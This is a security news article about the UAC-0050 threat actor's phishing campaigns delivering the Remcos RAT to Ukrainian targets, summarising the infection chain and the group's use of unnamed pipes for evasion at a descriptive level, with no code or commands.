UAC-0050, a threat actor active since 2020, is employing sophisticated phishing tactics to distribute the notorious Remcos RAT, known for its capabilities in remote surveillance and control. According to Uptycs security researchers Karthick Kumar and Shilpesh Trivedi, the group has recently integrated a pipe method for interprocess communication, showcasing advanced adaptability in their operational methods.
UAC-0050 has a history of targeting Ukrainian and Polish entities through social engineering campaigns, using phishing emails that impersonate legitimate organizations. In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) linked the group to a phishing campaign designed to deliver Remcos RAT.
Over the past few months, the Remcos RAT has been distributed as part of at least three different phishing waves, with one attack leading to the deployment of an information stealer called Meduza Stealer. The researchers based their analysis on an LNK file discovered on December 21, 2023.
While the exact initial access vector is currently unknown, it is suspected to have involved phishing emails targeting Ukrainian military personnel, advertising consultancy roles with the Israel Defense Forces (IDF). The LNK file collects information about installed antivirus products, retrieves and executes an HTML application, and paves the way for a PowerShell script that downloads two files from a remote server.
The downloaded files, “word_update.exe” and “ofer.docx,” are then utilized to establish persistence and execute the Remcos RAT (version 4.9.2 Pro). The Remcos RAT has the capability to harvest system data, cookies, and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.
Notably, the group employs unnamed pipes within the Windows operating system, creating a covert channel for data transfer, effectively evading detection by Endpoint Detection and Response (EDR) and antivirus systems. Despite not being an entirely new technique, the use of pipes marks a significant leap in the sophistication of UAC-0050’s strategies.